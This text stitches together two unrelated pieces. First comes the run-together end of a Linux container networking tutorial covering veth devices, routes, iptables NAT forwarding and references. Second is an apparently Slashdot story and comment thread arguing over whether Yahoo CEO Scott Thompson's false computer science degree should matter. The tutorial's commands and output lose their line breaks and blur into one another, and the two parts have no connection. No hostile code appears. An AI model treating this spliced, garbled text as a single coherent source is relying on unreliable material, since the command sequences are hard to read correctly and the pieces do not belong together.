00:00:00:00:00:00 brd 00:00:00:00:00:00# List all iptables rules root@sw-20160616-01:/home/andrewhowden# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destinationChain FORWARD (policy ACCEPT) target prot opt source destinationChain OUTPUT (policy ACCEPT) target prot opt source destination# List all network routes $ ip route show By default, the container has no network connectivity — not even the loopback adapter is up. We cannot even ping ourselves! $ ping 127.0.0.1 PING 127.0.0.1 (127.0.0.1): 56 data bytes ping: sending packet: Network is unreachable We can start setting up the expected network environment by bringing up the loopback adapter: $ ip link set lo up root@sw-20160616-01:/home/andrewhowden## Test the loopback adapter $ ping 127.0.0.1 PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.092 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.068 ms However, we cannot access the outside world. In most environments our host machine will be connected via ethernet to a given network and either have an IP assigned to it via the cloud provider or, in the case of a development or office machine, request an IP via DHCP. However our container is in a network namespace of its own and has no knowledge of the ethernet connected to the host. To connect the container to the host we need to employ a veth device. veth, or "Virtual Ethernet Device" is defined by man vetTo create a `veth device we can run as: The veth devices are virtual Ethernet devices. They can act as tunnels between network namespaces to create a bridge to a physical network device in another namespace, but can also be used as standalone network devices. This is exactly what we need! Because unshare creates an anonymous network namespace we need to determine what the pid of the process started in that namespace is[27][28]: $ echo $$ 18171 We can then create the veth device: $ sudo ip link add veth0 type veth peer name veth0 netns 18171 We can see both on the host and the guest these virtual ethernet devices appear. However, neither has an IP attached nor any routes defined: # Container$ ip addr 1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: veth0@if7: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether 16:34:52:54:a2:a1 brd ff:ff:ff:ff:ff:ff link-netnsid 0 $ ip route show# No output To address that we simply add an IP and define the default route: # On the host $ ip addr add 192.168.24.1 dev veth0# Within the container $ ip address add 192.168.24.10 dev veth0 From there, bring the devices up: # Both host and container $ ip link set veth0 up Add a route such that 192.168.24.0/24 goes out via veth0: # Both host and guest ip route add 192.168.24.0/24 dev veth0 And voilà! We have connectivity to the host namespace and back: # Within container $ ping 192.168.24.1 PING 192.168.24.1 (192.168.24.1): 56 data bytes 64 bytes from 192.168.24.1: icmp_seq=0 ttl=64 time=0.149 ms 64 bytes from 192.168.24.1: icmp_seq=1 ttl=64 time=0.096 ms 64 bytes from 192.168.24.1: icmp_seq=2 ttl=64 time=0.104 ms 64 bytes from 192.168.24.1: icmp_seq=3 ttl=64 time=0.100 ms However, that does not give us access to the wider internet. While the veth adapter functions as a virtual cable between our container and our host, there is currently no path from our container to the internet: # Within container $ ping google.com ping: unknown host To create such a path we need to modify our host such that it functions as a “router” between its own, separated network namespaces and its internet facing adapter. Luckily, Linux is set up well for this purpose. First, we need to modify the normal behaviour of Linux from dropping packets not destined for IP addresses with which their associated but rather allow forwarding a packet from one adapter to the other: # Within container $ echo 1 > /proc/sys/net/ipv4/ip_forward That means when we request public facing IPs from within our container via our veth adapter to our host veth adapter the host adapter won’t simply drop those packets. From there we employ iptables rules on the host to forward traffic from the host veth adapter to the internet facing adapter — in this case wlp2s0: # On the host # Forward packets from the container to the host adapter iptables -A FORWARD -i veth0 -o wlp2s0 -j ACCEPT# Forward packets that have been established via egress from the host adapater back to the contianer iptables -A FORWARD -i wlp2s0 -o veth0 -m state --state ESTABLISHED,RELATED -j ACCEPT# Relabel the IPs for the container so return traffic will be routed correctly iptables -t nat -A POSTROUTING -o wlp2s0 -j MASQUERADE We then tell our container to send traffic it doesn’t know anything else about down the veth adapter: # Within the container $ ip route add default via 192.168.24.1 dev veth0 And the internet works! $ # ping google.com PING google.com (172.217.22.14): 56 data bytes 64 bytes from 172.217.22.14: icmp_seq=0 ttl=55 time=16.456 ms 64 bytes from 172.217.22.14: icmp_seq=1 ttl=55 time=15.102 ms 64 bytes from 172.217.22.14: icmp_seq=2 ttl=55 time=34.369 ms 64 bytes from 172.217.22.14: icmp_seq=3 ttl=55 time=15.319 ms As mentioned, each container implementation can implement networking differently. There are implementations that use the aforementioned veth pair, vxlan, BPF or other cloud specific implementations. However, when designing containers we need some way to reason about what behaviour we should expect. To help address this the “Container Network Interface” tooling has been designed. This allows defining consistent network behaviour across network implementations, as well as models such as Kubernetes shared lo adapter between several containers. The networking side of containers is an area undergoing rapid innovation but relying on: - A lointerface - A public facing eth0(or similar) interface being present seems a fairly stable guarantee. Landscape review Given our understanding of the implementation of containers we can now take a look at some of the classic docker discussions. Systems Updates One of the oft overlooked parts of containers is the necessity to keep both them, and the host system up to date. In modern systems it is quite common to simply enable automatic updates on host systems and, so long as we stick to the system package manager and ensure updates stay successful, the system will keep itself both up to date and stable. However, containers take a very different approach. They’re effectively giant static binaries deployed into a production system. In this capacity they can do no self maintenance. Accordingly even if there are no updates to the software the container runs, containers should be periodically rebuilt and redeployed to the production system — less they accumulate vulnerabilities over time. Init within container Given our understanding of containers its reasonable to consider the “1 process per container” advice and determine that it is an oversimplification of how containers work, and it makes sense in some cases to do service management within a container with a system like runit. This allows multiple processes to be executed within a single container including things like: syslog logrotate cron And so forth In the case where Docker is the only system that is being used it is indeed reasonable to think about doing service management within docker — particularly when hitting the constraints of shared filesystem or network state. However systems such as Kubernetes, Swarm or Mesos have replaced much of the necessity of these init systems; tasks such as log aggregation, restarting services or colocating services are taken care of by these tools. Accordingly its best to keep containers simple such that they are maximally composable and easy to debug, delegating the more complex behaviour out. In Conclusion Containers are an excellent way to ship software to production systems. They solve a swathe of interesting problems and cost very little as a result. However, their rapid growth has meant some confusion in industry as to exactly how they work, whether they’re stable and so fourth. Containers are a combination of both old and new Linux kernel technology such as namespaces, cgroups, seccomp and other Linux networking tooling but are as stable as any other kernel technology (so, very) and well suited for production systems. ❤ for making it this far. References - “Docker.” . - “Cloud Native Technologies in the Fortune 100.” , Sep-2017. - B. Cantrill, “The Container Revolution: Reflections After the First Decade.” , Sep-2018. - “Papers (Jail).” . - “An absolutely minimal chroot.” , Jan-2011. - J. Beck et al., “Virtualization and Namespace Isolation in the Solaris Operating System (PSARC/2002/174).” , Sep-2006. - M. Kerrisk, “Namespaces in operation, part 1: namespaces overview.” , Jan-2013. - A. Polvi, “CoreOS is building a container runtime, rkt.” , Jan-2014. - “Basics of the Unix Philosophy.” esr/writings/taoup/html/ch01s06.html . - P. Estes and M. Brown, “OCI Image Support Comes to Open Source Docker Registry.” , Oct-2018. - “Open Container Initiative Runtime Specification.” , Mar-2018. - “The 5 principles of Standard Containers.” , Dec-2016. - “Open Container Initiative Image Specification.” , Jun-2017. - “Open Container Initiative Distribution Specification.” , Mar-2019. - “Docker Overview.” . - J. Frazelle, “Containers aka crazy user space fun.” , Jan-2018. - “Use Host Networking.” . - Krallin, “Tini: A tini but valid init for containers.” , Nov-2018. - . - [[0pointer.resources]]L. Poettering, “systemd for Administrators, Part XVIII.” , Oct-2012. - A. Howden, “Coming to grips with eBPF.” , Mar-2019. - “Seccomp security profiles for docker.” . - “Linux kernel capabilities.” . - M. Stemm, “SELinux, Seccomp, Sysdig Falco, and you: A technical discussion.” , Dec-2016. - “Pod Security Policies.” . - Programster, “Example OverlayFS Usage.” , Nov-2015. - “How do I connect a veth device inside an ’anonymous’ network namespace to one outside?” , Oct-2017. - D. P. García, “Network namespaces.” , Apr-2016. Originally published at on March 27, 2018.
https://andrewhowdencom.medium.com/what-is-a-container-46c42f68d8cc?source=post_page-----46c42f68d8cc--------------------------------
CC-MAIN-2021-43
refinedweb
4,977
50.67
Hi, I host an IronRuby engine in my app and get a lot of compiler warnings about duplicate definitions for classes in System.Linq. In the past it wasn’t much of an issue but now that I have started using some Linq functionality I have found myself having to add and remove System.Linq and Microsoft.Scripting.Core to get my app to compile. It seems that when there is a conflict the assembly reference added last wins. Is there a better way to solve this? Are the DLR and main .Net Linq namespaces going to merge in the future? Thanks, Aaron
https://www.ruby-forum.com/t/namespace-conflict-system-linq/165454
CC-MAIN-2021-25
refinedweb
103
75.91
Before implementing Java program for bubble sort let's first see how bubble sort functions to sort array elements in either ascending or descending order. Bubble sort is the simplest sorting algorithm among available ones. However, its simplicity does not carry much value because it is one of the most time consuming sorting algorithms, but as it's conceptually the simplest of the sorting algorithms and for that reason is a good beginning for exploration of sorting techniques. Here this algorithm is included just for beginners. Because of its poor O(n2) runtime performance, it is not used often for large (or even medium-sized) lists. This article implements bubble sort in Java and explains bubble sort algorithm briefly. Writing Java code for bubble sort is a trivial task. Let's assume that we have an array of length N having randomly ordered elements indexed from 0 to N-1, and we want to sort it in ascending order. While sorting the array elements, bubble sort at one time can see only two adjacent elements of the array. Bubble sort starts from the left end of the array and compare two elements in position 0 and 1. If the element positioned at 0th index is larger, we swap them. If the 1st element is larger, we don't do anything. Then we move over one position and compare the elements in positions 1 and 2. Again, if the one on the left is larger, we swap them else do nothing. While doing so we place the largest element at the last position of the array. We repeat this process N number of times so as to sort all array elements. The following Java program develops a class BubbleSort that contains a parameterized static generic method bubbleSort for any base type T. Note that Java provides the java.util.Comparable interface that contains a single method, compareTo. Any class that correctly implements this interface guarantees a total ordering of its instances. class BubbleSort { public static <T extends Comparable<T>> void bubbleSort (T[] list, int size) { int swapOccurred = 1, outCounter, inCounter; T temp; // swapOccurred helps to stop iterating if the array gets sorted before // outCounter reaches to size for (outCounter = size - 1; outCounter > 0 && swapOccurred == 1; outCounter--) { swapOccurred = 0; for (inCounter = 0; inCounter < outCounter; inCounter++) { if (list[inCounter].compareTo(list[inCounter+1]) > 0) { temp = list[inCounter]; list[inCounter] = list[inCounter+1]; list[inCounter+1] = temp; swapOccurred = 1; } } } } } public class BubbleSortDemo { public static void main (String[] args) { Integer arr[] = {10, 9, 8, 7, 6, 5, 4, 3, 2, 1}; BubbleSort.bubbleSort(arr, arr.length); System.out.println("Sorted Array: "); for(Integer i : arr) { System.out.println(i); } } } OUTPUT ====== Sorted Array: 1 2 3 4 5 6 7 8 9 10 The idea of above implementation is to put the smallest element at the beginning of the array (index 0) and the largest item at the end (index size-1). The loop counter outCounter in the outer for loop starts at the end of the array, at size-1, and decrements itself each time through the loop. The items at indices greater than outCounter are always completely sorted. The outCounter variable moves left after each pass by inCounter so that items that are already sorted are no longer involved in the algorithm. The inner loop counter inCounter starts at the beginning of the array and increments itself each cycle of the inner loop, exiting when it reaches out. Within the inner loop, the two array cells pointed to by inCounter and inCounter+1 are compared, and swapped if the one in inCounter is larger than the one in inCounter+1. Above implementation of BubbleSort iterates through the array elements O(N2) times in the worst case when the array to be sorted is reversely ordered. To make BubbleSort implementation somewhat efficient we added a flag swapOccurred that tells us if a swap occurred or not. There will not even a single swap occur if the array is sorted, and in that case we can stop iterating through array elements. Bubble sort, as such serves no benefit from the efficiency's point of view. Yet, it is taught in computer science courses, just for exploration of sorting techniques. Bubble sort is very slow and runs in O(N2) time in the worst case. However, after having swapOccurred introduced it shows some performance gains. In this tutorial we discussed Bubble sort. We implemented bubble sort algorithm in Java. Bubble sort is the most basic and the slowest sorting technique
http://cs-fundamentals.com/data-structures/bubble-sort-in-java.php
CC-MAIN-2017-17
refinedweb
753
61.36
#include <tlsdefault.h> This is an abstraction of the various TLS implementations. Definition at line 30 of file tlsdefault.h. Supported TLS types. Definition at line 37 of file tlsdefault.h. Constructs a new TLS wrapper. Definition at line 41 of file tlsdefault.cpp. Virtual Destructor. Definition at line 72 of file tlsdefault.cpp. This function performs internal cleanup and will be called after a failed handshake attempt. Definition at line 108 100 of file tlsdefault.cpp. Use this function to feed unencrypted data to the encryption implementation. The encrypted result will be pushed to the TLSHandler's handleEncryptedData() function. Definition at line 92 of file tlsdefault.cpp. This function is used to retrieve certificate and connection info of a encrypted connection. Reimplemented from TLSBase. Definition at line 136 114 of file tlsdefault.cpp. Returns the state of the encryption. Reimplemented from TLSBase. Definition at line 122 of file tlsdefault.cpp. Use this function to set a number of trusted root CA certificates which shall be used to verify a servers certificate. Definition at line 130 of file tlsdefault.cpp. Use this function to set the user's certificate and private key. The certificate will be presented to the server upon request and can be used for SASL EXTERNAL authentication. The user's certificate file should be a bundle of more than one certificate in PEM format. The first one in the file should be the user's certificate, each cert following that one should have signed the previous one. Definition at line 144 of file tlsdefault.cpp. Returns an ORed list of supported TLS types. Definition at line 77 of file tlsdefault.cpp.
https://camaya.net/api/gloox-0.9.9.12/classgloox_1_1TLSDefault.html
CC-MAIN-2019-18
refinedweb
274
53.27
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. Better JSON Messages2:02 with Naomi Freeman We can customize our application's responses to include more than just a status header. In this video, we'll learn how to provide more detailed json responses for our API. Code Samples We can return more detailed information than just a header with a status. Here is what our create method in app/controllers/api/todo_lists_controller.rb looks like now: def create list = TodoList.new(list_params) if list.save render json: { status: 200, message: "Successfully created To-do List.", todo_list: list }.to_json else render json: { status: 500, errors: list.errors }.to_json end end More Reading Check out Active Model Serializations and Active Model JSON Serialization for more information on as_json - 0:00 Right now, we have ToDoList creation working, and - 0:03 we get a header back when we successfully create a to do list with our API. - 0:07 The only thing is, all we get back is a header saying okay or 500. - 0:11 You might be thinking to yourself, self, - 0:15 wouldn't it be nice if we could get back the to do list we just created, or - 0:18 some error messages if we weren't able to create it? - 0:22 And self, you'd be right. - 0:23 Let's go ahead and do that now. - 0:26 Open up the API ToDoList controller and head down to the create method. - 0:30 This time if the list saves, let's return that along with the success message. - 0:40 Render JSON, with our status 200 code. - 0:43 [BLANK_AUDIO] - 0:46 Adding the message. - 0:48 Successfully created ToDoList. - 0:50 [BLANK_AUDIO] - 0:57 And adding this dot to JSON. - 1:00 This is going to return a JSON object, - 1:02 that says we successfully created a ToDoList. - 1:05 The status is 200 for success, the message is successful and - 1:09 we also return a JSON encoded version of the ToDoList. - 1:13 If we run this with CURL, we get the following. - 1:18 Our status 200 code and this new message, successfully created ToDoList. - 1:24 So we know that that worked. - 1:26 Awesome! - 1:28 Now, let's do the same thing for the error case. - 1:34 Again, we're going to render the JSON, with the appropriate status code. - 1:41 As well as a list of errors. - 1:44 And make sure that we dot to JSON. - 1:48 Now when we run our CURL request with a blank title. - 1:51 [BLANK_AUDIO] - 1:54 We get the following, the 500 status code and the list of errors. - 2:01 That looks pretty good.
https://teamtreehouse.com/library/build-a-rails-api/coding-the-api/better-json-messages
CC-MAIN-2018-17
refinedweb
473
75.4
Leave Yahoo CEO Scott Thompson Alone! 319 theodp writes "Over at The Daily Beast, Dan Lyons says Resumegate is overblown and says it's time to stop picking on Yahoo CEO Scott Thompson. Even without the circa-1979 CS degree some incorrectly thought he possessed, Lyons argues that Thompson is still perfectly capable, his critics have ulterior motives, and his competitors have all lied before. 'Forgive me for being less than shocked at the idea of a CEO lying,' writes Lyons. 'Steve Jobs [college dropout] [college dropout] last fall settled charges brought by the FTC that his company had made "unfair and deceptive" claims—I think that's like lying—and, what's more, had violated federal laws.' So what makes the fudging of a 30-year old accomplishment on the Yahoo CEO's resume a transgression that the 'highly ethical and honest folks in Silicon Valley' simply cannot bear? 'Facebook is a cool kid,' explains Lyons. 'So is Apple. Yahoo is the loser kid that nobody likes.'" It's the hypocricy (Score:5, Insightful) The assumption is that an employee who lied on his resume would likely be fired, but a CEO is too important to fire. Re:It's the hypocricy (Score:5, Insightful). Re: (Score:2). So you think this is worse because a CEO can tell more important lies, to more important people (than the average worker)? Isn't that why CEOs are often allowed to lie in the first place? The summary gives lots of examples of CEOs lying -- big lies to important people -- but we're all familiar with common CEO lies that are socially accepted: Our earnings are up. We're not going to have layoffs. My outrageous salary is justified by my unique skills. Note that the accepted lies from CEOs include protecting an Re:It's the hypocricy (Score:4, Insightful) Honestly, I truly doubt his supposed CS degree from 1979 ever ONCE came up in the board's discussion to hire him. It's entirely irrelevant to the job at hand. In all likelihood it was either taken straight from his bio on e-bay (which may or may not have come from him) or the 5th page of his resume that hadn't been updated in 20 years. It's not about him being CEO, it's about whether a degree even matters for a 50+ year old employee with a strong employment background. It doesn't. Yes, a junior programmer who explicitly lied about his degree should get fired, because that would be a critical part of the decision to hire him. But an older employee gets hired based on a solid work history and his degree may never come into question. In that case, CEO or not, the employee would probably not get fired just for having a lie 5 pages deep in his resume.. Re: (Score:2). I would think all information you provide is _all_ under the assumption of "this is true to my knowledge". What is the point of it if it's not true? Does that really have to be spelled out? Re:It's the hypocricy (Score:5, Insightful) Yes, a junior programmer who explicitly lied about his degree should get fired, because that would be a critical part of the decision to hire him. Same goes for the CEO. A critical part of the decision to hire him was that he made the best effort to give correct information to the Board of Directors. Even if it were truly irrelevant that the CEO had a technical degree (which I doubt), you still have the issue of lying to your employer which is routinely grounds for dismissal. But let's suppose your view of things is correct, that the CEO didn't lie to the Board, and that this person merely uses a fraudulent biography for their public face at the company. It's still a remarkable lack of professionalism and display of poor judgment. Re:It's the hypocricy (Score:4, Insightful) The issue I have with this is that he likely has had that degree listed on his resume for a very long time. From the very beginning, when he first placed it there, he was using that lie to help him get to where he is today. While he currently does not need the degree to do his job adequately (unlike, say, a degree in engineering), there probably was a time in one of his prior jobs where that degree was required or highly useful for him to be considered for a position. In other words, he used this lie to get to this point in his career. This is not a one-time thing. Re: (Score:2) Any other employee would be fired for lying on a resume. It's not about the fraudulent answer -- it's about the fact of the lie. It's about them being untrustworthy. It's about you having to question everything they say. It's about the deeper question of whether you can count on them at all. Only once did I encounter this situation in my career. Out of fear of a wrongful dismissal lawsuit, the lier was allowed to work the remainder of their contract and terminated at the end of their 3 month term. B Re: (Score:2) Make that added "#include <stdio.h>" before each and every IO function call, as in: int im_in_my_function_now() { ... #include <stdio.h> printf( "I've entered my function!\n" ); Re:It's the hypocricy (Score:5, Insightful) Honestly, I truly doubt his supposed CS degree from 1979 ever ONCE came up in the board's discussion to hire him. I bet it did, albeit in passing: "oh, look: he has a degree in CompSci. That'd give us a little cred with other tech companies." It's not about him being CEO, it's about whether a degree even matters for a 50+ year old employee with a strong employment background. It doesn't. Therefore, he shouldn't have included it as a reason why they should hire him. But on a practical level, I despise that I'm competing for jobs with liars. My resume is probably a lot shorter than his, but it's completely accurate. I did the things I listed. I earned the degree I put on there. I'd hate to think that my resume - my summary description of why a company would want to hire me - is competing with another guy's which is sprinkled with lies that make him look like a better candidate. I guess I see it the same way as professional athlete who doesn't want to compete with steroid-fueled monstrosities. I want to get ahead by my own merits, but how am I supposed to go up against people who don't play by the rules? Given the choice between outing them to level the playing field or having to stoop to their level, I'd much rather start enforcing those rules. So fire him. He lied to get to where he is. Maybe that particular lie wasn't the make-or-break that got him the job over someone else who wanted it, but it was important enough to him that he included it. Re: (Score:3, Interesting). Some business law history. Prior to about 200 College should not be used as part of hiring (Score:2) College should not be used as part of hiring. Even more so in the tech field. So what some who is doing a IT job lied about College?? (may to just get past HR) who cares if they can do the job? You know not all people are not college material but they can take tech classes / go to tech schools. So what if they when as a non-matriculated student or took classes non degree? That is why at least for TECH there needs to be some kind of badges system. Re: (Score:3) This is a nice idea, but it flies directly into the extremely strongly held cultural / sociological belief that there is no difference between education and training and they're just synonyms for the same thing. You'd have better luck convincing people God does not exist thru logical argument. "College is training for a good job" is as closely held a belief as "god exists" In some ways, more closely held. We have badges, they're called certifications, and decades of handing them out like crackerjack prize Re: (Score:2) Re: (Score:2) Most companies I know of will not fire employees for resume lies. They will seek to fire employees for other reasons, and discover resume lies as one ironclad reason to do so. But a competent employee whose resume lie came to light for another reason? They'd get a formal admonishment in their record for doing so, which would create a window of about a year where a justified dismissal could be done if needed, but assuming they continued to be competent? Hardly anyone would let them go. Re:It's the hypocricy (Score:4, Insightful) So what makes the fudging of a 30-year old accomplishment on the Yahoo CEO's resume a transgression...? 2 wrongs don't make a right? The continuing saga of US CEOs ripping off the public? The fact that a senior executive might be good, but that doesn't excuse immorality and in fact makes it much more likely that they'll screw 'consumers/customers/stakeholders' along the way. There's many reasons, they should all be called on it unless you like more ENRON style failures. Re:It's the hypocricy (Score:5, Interesting) I may be an old fashioned relic but my word is my bond. It is important from a practical level I cannot do business with you if you are lying unless I mean to simply screw you over. I have no way of negotating with you in good faith. if I want repeat busness I cannot pursue a strategy of wringing ever last drop from a deal simply achieve what I need at a profitable arrangement for both parties. If you lie to me I cannot do this. Re: (Score:2) Except he didn't lie to you. This has nothing to do with YOU. Re:It's the hypocricy (Score:4, Insightful) I am trying to understand the concept of why you would wait for a know liar to lie to you before no longer trusting them. This whole corporate public relations yarn that it is acceptable to lie as long as it makes money, regardless of the other consequences of the lie ie, other people lose money, other people get sick, other people die, face is just crap. People have an expectation of not being lied to by every single person they meet and, in fact of not being lied to as standard business practice by modern corporations even though, that is exactly was is happen all PR=B$ upped by mass media as somehow being acceptable. Enough is enough, corporations and their executives get caught out and they will be mocked, ridiculed and derided , it will be harsh and, extended because hint, hint everyone is sick of it being standard 'modus operandi' for corporations. Re: (Score:3) Where did he say he believed that other people are always telling the truth? He said he can't maintain long term business relations with people who have a history of lying to him. That said; in my experience nothing lasts forever. You have to KEEP THEM HONEST by never trusting anybody. Investors should care (Score:3) It depends on WHEN he lied. Really? If he thinks it is acceptable to lie to make himself look better then on his CV then, were I a Yahoo! stock holder, I would be concerned that he might also think it acceptable to lie to make the company's bottom line (and by extension himself) look better. In many ways the ethical behaviour of the CEO is far more important than those in the rest of the company - if the sandwich guy decides to behave unethically you risk losing a few $100 of sandwiches. If the CEO behaves unethically you can lose ev Re:It's the hypocricy (Score:5, Insightful) The standard here is that everybody is expected to respect common decency and have a reasonable level of personal integrity, regardless of CEO or the common worker. Claiming a degree violates both to the extreme. Degrees are things people trust. Claiming one without having one it a violation of the order of society. It also reflects massively and negatively on the character of the person doing it. Hence lying about a degree disqualifies you as a member of decent society, must get you ass fired and your career to be over. Or you can go the way of, for example, Northern Korea, where a nil-whit is called the "Genius of the Geniuses". Of course, _that_ guy is a figurehead. Re:It's the hypocricy (Score:5, Insightful) More like by lying he's secured himself an opportunity that never would have been given him otherwise. It's a messed up society when you can get further by lying and cheating than you can by playing it straight. Re: (Score:2) It's a messed up society when you can get further by lying and cheating than you can by playing it straight. I understand where you're coming from, but the above is a truism. You could reasonably define cheating as "lying to get ahead unfairly", so by definition, cheating would always get you further ahead than would playing it straight. Re: (Score:3) Hence lying about a degree disqualifies you as a member of decent society, must get you ass fired and your career to be over. Being a decent member of society is not a prerequisite to being a CEO. Re: (Score:2) Heck, it probably disqualifies you. Wasn't there a study that confirmed that? (Score:3) Re: (Score:2) to become a regular "M.D." requires a lot more than telling someone in H.R. that you have a degree. Re: (Score:2) It wouldn't matter, because he can claim to have all the medical degrees he wants, but if he doesn't have a verifiable medical license, he can't do squat anyway. Re: (Score:3) There are specific legal consequences to practicing medicine without a license, and the employer would be liable. That is not true in most fields. Re:It's the hypocricy (Score:5, Insightful) "Yes, the CEO is far more important to the company than the sandwich guy." Therefore is far more important to get the facts right *prior* to hire somebody for that role, isn't it? Well, by lying about his CV in order to get his position, his lie is far more important than the sandwich guy doing the same, isn't it? Now, what was your point, again? Re: (Score:3) Yes, the CEO is far more important to the company You can reasonably argue thats not true. The only constant of corporate life is groupthink concentrates at the top. A standard issue stuffed suit is identical to any other standard issue stuffed suit. Any variation in results by different stuffed suits is caused by natural market variation. Who the board selects is not really all that important. Very much like programmer output, the top 0.1% of rock star workers (programmer or CEO) will outperform the masses by a factor of 10, but there are not enough 0. Re: (Score:2) There's a big difference between a Steve Jobs and a Carly Fiorina though. Re: (Score:3) Donno. The HP killer was the impedance mismatch between ultra high volume commodity computer sales for a profit of $10K/shipping container, medium volume selling small quantities of inkjet ink for $10K/gallon, and ultra low volume selling exotic EE test equipment for roughly $10K/kilo. If you found three independent companies and pitched for VC or junk bonds to finance a merger, they'd put you in a straitjacket. No matter who was in charge, HP was going to have to explode and crash, and the people who t Re: (Score:2) He is paid way too much for anyone to tolerate the merest failing. Your salary reflects your abilities, importance and responsibilities. High salary means that I have a very high expectation of your morals. The CEO picked his salary, so he deals with the backslash when it turns out he is a lying scumbag. Re: (Score:2) High salary means that I have a very high expectation of your morals. That's funny, with me it's the other way around. Re: (Score:2) To build on your point, the companies referenced as contrasts here (Apple, Google, Facebook) are all hugely successful. Whereas Yahoo, under the current CEO, isn't. In the real world, being successful gets you a lot of latitude. There's less tolerance for things like dishonesty if you don't at least get results (for those who would judge you) while lying. Re: (Score:2) "Why would you fire an employee who lied on their CV, yet does the job well?" To send a message. Provided the employee does in fact the job well, it can't be because of the statements in his resume that led to hiring him so, from the part of the contractor it was blind luck. If you are going to hire under a "blind luck" assumptions, you surely should better fire all your hiring personnel and just hire on, say, a first come first gets it basis (hummm... for so many companies I think it wouldn't be such a big Re:1979 was pre-PC era (Score:5, Insightful) This is an astonishingly ignorant thing to write. What part of CS is different now than from 1979? Has O(n) suddenly become equal to O(log n)? Regardless, recent trends have been bringing computing back to the mainframe model. Computation started out concentrated on mainframes because computers were so expensive. Microcomputers pushed computation out to the edges. Cloud and webservices are swinging the pendulum back to a centralized model, but guess what? CS has been relevant and valid though that entire spectrum. Whether or not CS is important to the CEO of Yahoo! is arguable. I think most people are concerned about Thompson's values, not his knowledge of balancing trees. Re:1979 was pre-PC era (Score:5, Insightful) "This is an astonishingly ignorant thing to write." If you hadn't noticed, Slashdot is dominated by IT types who may be excellent sysadmins or even good software engineers, but have very little idea what computer science is. Re: (Score:2) The funny thing is nothing is ever new in IT... Its all the same old stuff with new marketing, as the natural cycle turns. There is a huge competitive on the job advantage in having experienced the previous cycle(s) which noob IT people are completely blind to. Also its impossible to be a good software engineer or good sysadmin without knowing CS. Almost an oxymoron. Maybe they don't know enough math to follow Knuth, but a good one has at least a gut level instinctual level of low level CS knowledge. It Re: (Score:3) There's a slight difference between IT in 1979 and IT in 2012. Good software engineers know CS like good civil engineers know physics. A good civil engineer has to have an excellent knowledge of things like Newtonian mechanics, but doesn't really need to know much or anything about relativity, quantum mechanics, or most of the rest of physics. And he really doesn't need to know how to produce new knowledge of physics. Re: (Score:3) Slashdot is [NOW] dominated by IT types who may be excellent sysadmins or even good software engineers, but have very little idea what computer science is. FTFY. It wasn't always this way. Something bad happened after that number was made illegal. btw, mod up! Computer science is mathematics and only mathematics; CS is not coding, not SQL querying, not sysadmining... and a computer scientist installing software for a living is akin to a medical doctor working as a licenced practical nurse. Think of the poor LPN that must compete against M.D.s for their jobs! Think of the lowly auto mechanic that must compete against mechanical engineers just find gainful occup Re: (Score:2) Meaning what, exactly? My employer is implementing tablets... as front-end devices for mainframe-based computing. The tablet in this computing model is fundamentally no different from an X Terminal: a device with limited compute power and storage, acting as the physical user interface to a centralized system where all the data-processing takes place. And this isn't just in "enterprise" Re:1979 was pre-PC era (Score:5, Informative) Thank you for this demonstration of how age discrimination works in the tech industry. For the record, PCs existed before 1984, and as long as you don't insist on IBM-standard they also existed in 1979 (e.g. Commodore PET, TRS-80, Apple II). And there were CS degrees even before those existed. I have a CS degree from the 1980s (transcripts available), and as a matter of fact I did learn to write Fortran on a DEC minicomputer (a Vax 11; the PDP was in high school). Very little of my CS coursework was done on microcomputers: just graphics, assembly language, and an independent study. I had my own micro in my dorm room, which I used to dial into the Vax, for word processing, and to play Missile Command. No Internet, just a BITNET e-mail gateway. In fact, very few of the technology standards in use then are still in use now; even ASCII is on the way out. But what I learned back in the Dark Ages (before the Windows opened up) wasn't simply Fortran, command-line interfaces, and the use of parity bits over a serial connection. What I learned was how to solve problems, and those skills remain just as relevant and valuable today as they were a quarter century ago. Re:1979 was pre-PC era (Score:4, Informative) For the record, PCs existed before 1984 Not only did computers exist, but I'd say the biggest, most fundamental developments of computer science happened in the 1970s. In that decade, the greats like Lamport, Dijkstra, and Knuth were making the discoveries that underlie all modern systems. To name a few, linear programming, multithreading, distributed systems and processes, routing, and NP-completeness all got developed during the 70s. Would have been an awesome decade to be a computer scientist. Re: (Score:3) You forgot to mention your mad Multiplan skillz0rs. Re: (Score:3) Maybe the fact that there are people who lie on their CV and still do a good job means that the actual importance of a CV is hellishly overblown. Re: (Score:3) Liars make good CEOs. Re: (Score:2) At least some of the people who were designing machines in 1984 will have had a 1979 CS degree and if they're still designing machines today I'd hazard that they're quite good at it by now. Re:It's the hypocricy (Score:5, Insightful) Acceptance my ass. Getting away with things that one of lower social status would get the book thrown at him for is simply one of the perks of being part of the elite. We don't embrace it, we just grudgingly tolerate it because we have no choice. Re: (Score:3) I guess lying and blatant abuse works. That's right, it does. And it will continue to work until the alphabet soup government agencies who supposedly provide oversight start handing out penalties that are larger than the gains to be had. It's not a punishment if it's cheaper than doing things the right way, it's a discount. Re: (Score:3) Missing mod option: -1 blatant lies Missing mod option: -1 astro-turfing. Unethical Culture, Bah (Score:5, Insightful) Re:Unethical Culture, Bah (Score:4, Interesting) The only reasonable thing was said at the end ... by all means off with his head, it's a fucking good start. That's why the 0.1% is using the media to defend the undefendable, it sets a dangerous precedent ... being held accountable even the smallest bit must never even be on the table for them. I guess this means... (Score:5, Insightful) They've just moved to the top of my list of potential employers! Did I mention that I created the Internet, the World Wide Web, and all the programming languages they use? Re: (Score:3) I'm sorry, but lying on your resume and getting away with it is a privilege reserved for the elite. Re: (Score:2) I guess this means that it's fine to lie to Yahoo when applying for a job. Yahoo is a dying shell of a company with nothing innovative or interesting to work on. So in a way you have to lie - unless you put down "nobody else will hire me" as your reason for applying. Re: (Score:3) Do you want a leader who lies? (Score:5, Insightful) When it comes to the people who are leading a division or organization, this becomes even more important. What kind of shady deals would these people be willing to make, what kind of precarious situations would they be willing to put the company in? If you lie to get into the company on the bottom rung, it becomes more and more difficult to correct those lies as you progress in your career and climb the corporate ladder. If you choose to go that route, you'd better switch companies once you've acquired some experience and start your new job without lies. Re: (Score:2) Don't politicians lie all the time? A political promise 